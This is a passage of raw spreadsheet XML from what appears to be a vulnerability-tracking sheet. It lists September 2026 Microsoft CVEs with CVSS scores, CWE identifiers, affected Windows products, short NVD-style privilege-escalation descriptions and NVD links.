s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S557" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T557" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t></is></c></row><row r="558"><c r="A558" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B558" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C558" s="5" t="inlineStr"><is><t>CVE-2026-69709</t></is></c><c r="D558" s="5" t="n"><v>7.8</v></c><c r="E558" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F558" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G558" s="5" t="inlineStr" /><c r="H558" s="5" t="n"><v>0.003</v></c><c r="I558" s="5" t="inlineStr" /><c r="J558" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K55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58" s="5" t="inlineStr" /><c r="M558" s="5" t="inlineStr" /><c r="N558" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O558" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P558" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q558" s="5" t="inlineStr" /><c r="R558" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S558" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T558" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t></is></c></row><row r="559"><c r="A559" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B559" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C559" s="5" t="inlineStr"><is><t>CVE-2026-69720</t></is></c><c r="D559" s="5" t="n"><v>7.8</v></c><c r="E559" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F559" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G559" s="5" t="inlineStr" /><c r="H559" s="5" t="n"><v>0.003</v></c><c r="I559" s="5" t="inlineStr" /><c r="J559" s="5" t="inlineStr" /><c r="K559" s="5" t="inlineStr" /><c r="L559" s="5" t="inlineStr" /><c r="M559" s="5" t="inlineStr" /><c r="N559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P559" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q559" s="5" t="inlineStr" /><c r="R559" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S559" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t></is></c></row><row r="560"><c r="A560" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B560" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C560" s="5" t="inlineStr"><is><t>CVE-2026-69725</t></is></c><c r="D560" s="5" t="n"><v>7.8</v></c><c r="E560" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F560" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G560" s="5" t="inlineStr" /><c r="H560" s="5" t="n"><v>0.003</v></c><c r="I560" s="5" t="inlineStr" /><c r="J560" s="5" t="inlineStr" /><c r="K560" s="5" t="inlineStr" /><c r="L560" s="5" t="inlineStr" /><c r="M560" s="5" t="inlineStr" /><c r="N560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P560" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q560" s="5" t="inlineStr" /><c r="R560" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S560" s="5" t="inlineStr"><is><t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t></is></c></row><row r="561"><c r="A561" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B561" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C561" s="5" t="inlineStr"><is><t>CVE-2026-69731</t></is></c><c r="D561" s="5" t="n"><v>7.8</v></c><c r="E561" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F561" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G561" s="5" t="inlineStr" /><c r="H561" s="5" t="n"><v>0.003</v></c><c r="I561" s="5" t="inlineStr" /><c r="J561" s="5" t="inlineStr" /><c r="K561" s="5" t="inlineStr" /><c r="L561" s="5" t="inlineStr" /><c r="M561" s="5" t="inlineStr" /><c r="N561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O561" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P561" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q561" s="5" t="inlineStr" /><c r="R561" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S561" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t></is></c></row><row r="562"><c r="A562" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B562" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C562" s="5" t="inlineStr"><is><t>CVE-2026-69738</t></is></c><c r="D562" s="5" t="n"><v>7.8</v></c><c r="E562" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F562" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G562" s="5" t="inlineStr" /><c r="H562" s="5" t="n"><v>0.003</v></c><c r="I562" s="5" t="inlineStr" /><c r="J562" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K56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62" s="5" t="inlineStr" /><c r="M562" s="5" t="inlineStr" /><c r="N562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O562" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P562" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q562" s="5" t="inlineStr" /><c r="R562" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S562" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t></is></c></row><row r="563"><c r="A563" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B563" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C563" s="5" t="inlineStr"><is><t>CVE-2026-69758</t></is></c><c r="D563" s="5" t="n"><v>7.8</v></c><c r="E563" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F563" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G563" s="5" t="inlineStr" /><c r="H563" s="5" t="n"><v>0.003</v></c><c r="I563" s="5" t="inlineStr" /><c r="J563" s="5" t="inlineStr" /><c r="K563" s="5" t="inlineStr" /><c r="L563" s="5" t="inlineStr" /><c r="M563" s="5" t="inlineStr" /><c r="N563" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O563" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P563" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q563" s="5" t="inlineStr" /><c r="R563" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S563" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t></is></c></row><row r="564"><c r="A564" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B564" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C564" s="5" t="inlineStr"><is><t>CVE-2026-69785</t></is></c><c r="D564" s="5" t="n"><v>7.8</v></c><c r="E564" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F564" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G564" s="5" t="inlineStr" /><c r="H564" s="5" t="n"><v>0.003</v></c><c r="I564" s="5" t="inlineStr" /><c r="J564" s="5" t="inlineStr" /><c r="K564" s="5" t="inlineStr" /><c r="L564" s="5" t="inlineStr" /><c r="M564" s="5" t="inlineStr" /><c r="N564" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P564" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q564" s="5" t="inlineStr" /><c r="R564" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S564" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t></is></c></row><row r="565"><c r="A565" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B565" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C565" s="5" t="inlineStr"><is><t>CVE-2026-69787</t></is></c><c r="D565" s="5" t="n"><v>7.8</v></c><c r="E565" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F565" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G565" s="5" t="inlineStr" /><c r="H565" s="5" t="n"><v>0.003</v></c><c r="I565" s="5" t="inlineStr" /><c r="J565" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K56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65" s="5" t="inlineStr" /><c r="M565" s="5" t="inlineStr" /><c r="N565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P565" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q565" s="5" t="inlineStr" /><c r="R565" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S565" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t></is></c></row><row r="566"><c r="A566" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B566" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C566" s="5" t="inlineStr"><is><t>CVE-2026-69790</t></is></c><c r="D566" s="5" t="n"><v>7.8</v></c><c r="E566" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F566" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G566" s="5" t="inlineStr" /><c r="H566" s="5" t="n"><v>0.003</v></c><c r="I566" s="5" t="inlineStr" /><c r="J566" s="5" t="inlineStr" /><c r="K566" s="5" t="inlineStr" /><c r="L566" s="5" t="inlineStr" /><c r="M566" s="5" t="inlineStr" /><c r="N566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P566" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q566" s="5" t="inlineStr" /><c r="R566" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S566" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t></is></c></row><row r="567"><c r="A567" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B567" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C567" s="5" t="inlineStr"><is><t>CVE-2026-69799</t></is></c><c r="D567" s="5" t="n"><v>7.8</v></c><c r="E567" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F567" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G567" s="5" t="inlineStr" /><c r="H567" s="5" t="n"><v>0.002</v></c><c r="I567" s="5" t="inlineStr" /><c r="J567" s="5" t="inlineStr" /><c r="K567" s="5" t="inlineStr" /><c r="L567" s="5" t="inlineStr" /><c r="M567" s="5" t="inlineStr" /><c r="N567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P567" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q567" s="5" t="inlineStr" /><c r="R567" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S567" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t></is></c></row><row r="568"><c r="A568" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B568" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C568" s="5" t="inlineStr"><is><t>CVE-2026-69801</t></is></c><c r="D568" s="5" t="n"><v>7.8</v></c><c r="E568" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F568" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G568" s="5" t="inlineStr" /><c r="H568" s="5" t="n"><v>0.003</v></c><c r="I568" s="5" t="inlineStr" /><c r="J568" s="5" t="inlineStr" /><c r="K568" s="5" t="inlineStr" /><c r="L568" s="5" t="inlineStr" /><c r="M568" s="5" t="inlineStr" /><c r="N568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P568" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q568" s="5" t="inlineStr" /><c r="R568" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S568" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t></is></c></row><row r="569"><c r="A569" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B569" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C569" s="5" t="inlineStr"><is><t>CVE-2026-69821</t></is></c><c r="D569" s="5" t="n"><v>7.8</v></c><c r="E569" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F569" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G569" s="5" t="inlineStr" /><c r="H569" s="5" t="n"><v>0.003</v></c><c r="I569" s="5" t="inlineStr" /><c r="J569" s="5" t="inlineStr" /><c r="K569" s="5" t="inlineStr" /><c r="L569" s="5" t="inlineStr" /><c r="M569" s="5" t="inlineStr" /><c r="N569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P569" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q569" s="5" t="inlineStr" /><c r="R569" s="5" t="inlineStr"><is><t>CWE-116</t></is></c><c r="S569" s="5" t="inlineStr"><is><t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t></is></c></row><row r="570"><c r="A570" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B570" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C570" s="5" t="inlineStr"><is><t>CVE-2026-69822</t></is></c><c r="D570" s="5" t="n"><v>7.8</v></c><c r="E570" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F570" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G570" s="5" t="inlineStr" /><c r="H570" s="5" t="n"><v>0.003</v></c><c r="I570" s="5" t="inlineStr" /><c r="J570" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K570"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570" s="5" t="inlineStr" /><c r="M570" s="5" t="inlineStr" /><c r="N570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P570" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q570" s="5" t="inlineStr" /><c r="R570" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S570" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t></is></c></row><row r="571"><c r="A571" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B571" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C571" s="5" t="inlineStr"><is><t>CVE-2026-69841</t></is></c><c r="D571" s="5" t="n"><v>7.8</v></c><c r="E571" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F571" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G571" s="5" t="inlineStr" /><c r="H571" s="5" t="n"><v>0.003</v></c><c r="I571" s="5" t="inlineStr" /><c r="J571" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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1" s="5" t="inlineStr" /><c r="M571" s="5" t="inlineStr" /><c r="N571" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P571" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q571" s="5" t="inlineStr" /><c r="R571" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S571" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t></is></c></row><row r="572"><c r="A572" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B572" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C572" s="5" t="inlineStr"><is><t>CVE-2026-69844</t></is></c><c r="D572" s="5" t="n"><v>7.8</v></c><c r="E572" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F572" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G572" s="5" t="inlineStr" /><c r="H572" s="5" t="n"><v>0.003</v></c><c r="I572" s="5" t="inlineStr" /><c r="J572" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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2" s="5" t="inlineStr" /><c r="M572" s="5" t="inlineStr" /><c r="N572" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P572" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q572" s="5" t="inlineStr" /><c r="R572" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S572" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T572" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t></is></c></row><row r="573"><c r="A573" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B573" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C573" s="5" t="inlineStr"><is><t>CVE-2026-69864</t></is></c><c r="D573" s="5" t="n"><v>7.8</v></c><c r="E573" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F573" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G573" s="5" t="inlineStr" /><c r="H573" s="5" t="n"><v>0.002</v></c><c r="I573" s="5" t="inlineStr" /><c r="J573" s="5" t="inlineStr" /><c r="K573" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L573" s="5" t="inlineStr" /><c r="M573" s="5" t="inlineStr" /><c r="N573" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P573" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q573" s="5" t="inlineStr" /><c r="R573" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S573" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t></is></c></row><row r="574"><c r="A574" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C574" s="5" t="inlineStr"><is><t>CVE-2026-69900</t></is></c><c r="D574" s="5" t="n"><v>7.8</v></c><c r="E574" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F574" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G574" s="5" t="inlineStr" /><c r="H574" s="5" t="n"><v>0.003</v></c><c r="I574" s="5" t="inlineStr" /><c r="J574" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K574" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L574" s="5" t="inlineStr" /><c r="M574" s="5" t="inlineStr" /><c r="N574" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P574" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q574" s="5" t="inlineStr" /><c r="R574" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S574" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t></is></c></row><row r="575"><c r="A575" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C575" s="5" t="inlineStr"><is><t>CVE-2026-69907</t></is></c><c r="D575" s="5" t="n"><v>7.8</v></c><c r="E575" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F575" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G575" s="5" t="inlineStr" /><c r="H575" s="5" t="n"><v>0.003</v></c><c r="I575" s="5" t="inlineStr" /><c r="J575" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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75" s="5" t="inlineStr" /><c r="M575" s="5" t="inlineStr" /><c r="N575" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P575" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q575" s="5" t="inlineStr" /><c r="R575" s="5" t="inlineStr"><is><t>CWE-280</t></is></c><c r="S575" s="5" t="inlineStr"><is><t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t></is></c></row><row r="576"><c r="A576" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B576" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C576" s="5" t="inlineStr"><is><t>CVE-2026-69921</t></is></c><c r="D576" s="5" t="n"><v>7.8</v></c><c r="E576" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F576" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G576" s="5" t="inlineStr" /><c r="H576" s="5" t="n"><v>0.003</v></c><c r="I576" s="5" t="inlineStr" /><c r="J576" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K576" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L576" s="5" t="inlineStr" /><c r="M576" s="5" t="inlineStr" /><c r="N576" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P576" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q576" s="5" t="inlineStr" /><c r="R576" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S576" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t></is></c></row><row r="577"><c r="A577" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C577" s="5" t="inlineStr"><is><t>CVE-2026-70289</t></is></c><c r="D577" s="5" t="n"><v>7.8</v></c><c r="E577" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F577" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G577" s="5" t="inlineStr" /><c r="H577" s="5" t="n"><v>0.003</v></c><c r="I577" s="5" t="inlineStr" /><c r="J577" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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7" s="5" t="inlineStr" /><c r="M577" s="5" t="inlineStr" /><c r="N577" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P577" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q577" s="5" t="inlineStr" /><c r="R577" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S577" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T577" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t></is></c></row><row r="578"><c r="A578" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C578" s="5" t="inlineStr"><is><t>CVE-2026-70334</t></is></c><c r="D578" s="5" t="n"><v>7.8</v></c><c r="E578" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F578" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G578" s="5" t="inlineStr" /><c r="H578" s="5" t="n"><v>0.004</v></c><c r="I578" s="5" t="inlineStr" /><c r="J578" s="5" t="inlineStr" /><c r="K578" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L578" s="5" t="inlineStr" /><c r="M578" s="5" t="inlineStr" /><c r="N578" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P578" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q578" s="5" t="inlineStr" /><c r="R578" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S578" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t></is></c><c r="T578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t></is></c></row><row r="579"><c r="A579" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B579" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C579" s="5" t="inlineStr"><is><t>CVE-2026-70564</t></is></c><c r="D579" s="5" t="n"><v>7.8</v></c><c r="E579" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F579" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G579" s="5" t="inlineStr" /><c r="H579" s="5" t="n"><v>0.003</v></c><c r="I579" s="5" t="inlineStr" /><c r="J579" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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9" s="5" t="inlineStr" /><c r="M579" s="5" t="inlineStr" /><c r="N579" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P579" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q579" s="5" t="inlineStr" /><c r="R579" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S579" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T579" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t></is></c></row><row r="580"><c r="A580" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B580" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C580" s="5" t="inlineStr"><is><t>CVE-2026-70569</t></is></c><c r="D580" s="5" t="n"><v>7.8</v></c><c r="E580" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F580" s="5" 